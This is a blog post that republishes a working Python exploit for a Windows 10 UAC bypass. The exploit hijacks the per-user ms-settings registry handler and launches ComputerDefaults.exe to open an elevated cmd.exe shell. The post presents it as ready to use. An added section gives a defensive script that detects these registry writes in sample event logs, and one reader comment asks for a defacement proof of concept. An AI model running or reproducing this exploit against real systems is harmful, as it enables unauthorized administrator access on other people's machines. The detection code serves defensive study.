
LinuxSec Exploit

Nothing is Ever Locked


Microsoft Windows 10 – Local Privilege Escalation (UAC Bypass)

October 23, 2018 by Jack Wilder 2 Comments

Microsoft Windows 10 – Local Privilege Escalation (UAC Bypass) – This exploit is used to gain Admin access and bypass UAC on Windows 10. Its author tested it on Windows 10 pro Version 10.0.17134.285.

Exploit Title: Windows 10 UAC Bypass by computerDefault
Date: 2018-10-18
Exploit Author: Fabien DROMAS – Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
Twitter: st0rnpentest

Vendor Homepage: www.microsoft.com
Version: Version 10.0.17134.285
Tested on: Windows 10 pro Version 10.0.17134.285

exploit.py

#!/usr/bin/env python
#
# Exploit Title: Windows 10 UAC Bypass by computerDefault
# Date: 2018-10-18
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.microsoft.com
# Version: Version 10.0.17134.285
# Tested on: Windows 10 pro Version 10.0.17134.285
#

import os
import sys
import ctypes
import _winreg


def create_reg_key(key, value):
    try:
        _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
        _winreg.CloseKey(registry_key)
    except WindowsError:
        raise

def exec_bypass_uac(cmd):
    try:
        create_reg_key('DelegateExecute', '')
        create_reg_key(None, cmd)
    except WindowsError:
        raise

def bypass_uac():
    try:
        current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
        cmd = "C:\windows\System32\cmd.exe"
        exec_bypass_uac(cmd)
        os.system(r'C:\windows\system32\ComputerDefaults.exe')
        return 1
    except WindowsError:
        sys.exit(1)

if __name__ == '__main__':

    if bypass_uac():
        print "Enjoy your Admin Shell :)"
  • https://www.exploit-db.com/exploits/45660/
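
For defenders, the two registry writes made by exploit.py above are the detectable part. The following is an added example, not part of the original post or the exploit author's code: it flags writes to the per-user ms-settings open-command key in registry value-set events. The event field names (shaped like Sysmon registry value-set records), the sample records and the function name are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample records (not real telemetry). The field names follow the
# shape of Sysmon registry value-set events and are an assumption here.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-1001\Software\Microsoft\Windows\CurrentVersion\Run\Example",
     "Details": r"C:\Example\app.exe"},
    {"Image": r"C:\Python27\python.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-1001_Classes\ms-settings\shell\open\command\DelegateExecute",
     "Details": "(Empty)"},
    {"Image": r"C:\Python27\python.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-1001_Classes\ms-settings\shell\open\command\(Default)",
     "Details": r"C:\windows\System32\cmd.exe"},
    {"Image": r"C:\Tools\setup.exe",
     "TargetObject": r"HKCU\Software\Classes\ms-settings\shell\open\command\(Default)",
     "Details": r"C:\Tools\helper.exe"},
]

# Value under the per-user ms-settings handler key. Matching on the suffix covers
# both the HKCU\Software\Classes and HKU\<SID>_Classes spellings of the path.
HANDLER = re.compile(r"^(.*classes)\\ms-settings\\shell\\open\\command\\([^\\]+)$", re.I)


def find_ms_settings_hijack(events):
    """Group writes to the ms-settings open-command key by user hive."""
    by_hive = defaultdict(lambda: {"values": {}, "writers": set()})
    for ev in events:
        m = HANDLER.match(ev.get("TargetObject", ""))
        if not m:
            continue
        hive, value_name = m.group(1).lower(), m.group(2).lower()
        by_hive[hive]["values"][value_name] = ev.get("Details", "")
        by_hive[hive]["writers"].add(ev.get("Image", ""))
    findings = []
    for hive, seen in sorted(by_hive.items()):
        values = seen["values"]
        # exploit.py sets both DelegateExecute and the default value; seeing
        # both in one hive is the stronger signal.
        both = "delegateexecute" in values and "(default)" in values
        findings.append({"hive": hive, "severity": "high" if both else "medium",
                         "command": values.get("(default)"),
                         "writers": sorted(seen["writers"])})
    return findings


if __name__ == "__main__":
    for finding in find_ms_settings_hijack(SAMPLE_EVENTS):
        print(finding)
```

Any finding is worth triage, since the key lives under HKEY_CURRENT_USER and the exploit above writes it without elevation.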

Filed Under: Privilege Escalation

Reader Interactions

Comments

  1. paks says

    October 26, 2018 at 5:29 pm

    Post a new deface PoC, please, bro

  2. admin says

    November 19, 2018 at 2:16 am

    Root
